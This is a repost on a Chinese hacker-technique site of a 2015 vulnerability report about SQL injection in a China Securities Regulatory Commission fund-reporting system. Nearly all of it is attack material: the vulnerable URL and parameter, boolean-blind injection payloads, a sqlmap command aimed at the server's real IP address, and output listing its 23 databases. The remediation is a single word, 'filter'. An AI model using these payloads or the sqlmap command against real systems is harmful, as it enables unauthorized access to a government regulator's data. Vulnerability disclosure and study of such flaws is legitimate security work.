记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国证监会某系统存在SQL注入漏洞

2015-08-07 18:00

code 区域
http://fund.csrc.gov.cn/web/list_net.daily_report?fundCode=000985&reportType=FB040



注入参数:fundCode

payload:http://fund.csrc.gov.cn/web/list_net.daily_report?fundCode=000985' AND '8281'='8281&reportType=FB040



code 区域
http://fund.csrc.gov.cn/web/list_net.daily_report?fundCode=000985' AND 1=1 AND '8281'='8281&reportType=FB040





111111.jpg





漏洞证明:

code 区域
python sqlmap.py -u 'http://219.141.206.196/web/list_net.daily_report?fundCode=000985&reportType=FB040' --dbs



Parameter: fundCode (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: fundCode=000985' AND 4265=4265 AND 'DHPI'='DHPI&reportType=FB040

---

available databases [23]:

[*] CTXSYS

[*] DBSNMP

[*] DMSYS

[*] EXFSYS

[*] LIUZHICHAO

[*] MDSYS

[*] OLAPSYS

[*] ORDSYS

[*] OUTLN

[*] PTCMS_XBRL

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TSMSYS

[*] WMSYS

[*] XBRL_FUND

[*] XBRL_FUNDDATA

[*] XBRL_IPO

[*] XBRL_RCG

[*] XBRL_SIPO

[*] XBRL_UIPC

[*] XBRL_UIPCCMS

[*] XDB

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0121696

阅读:88833 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国证监会某系统存在SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云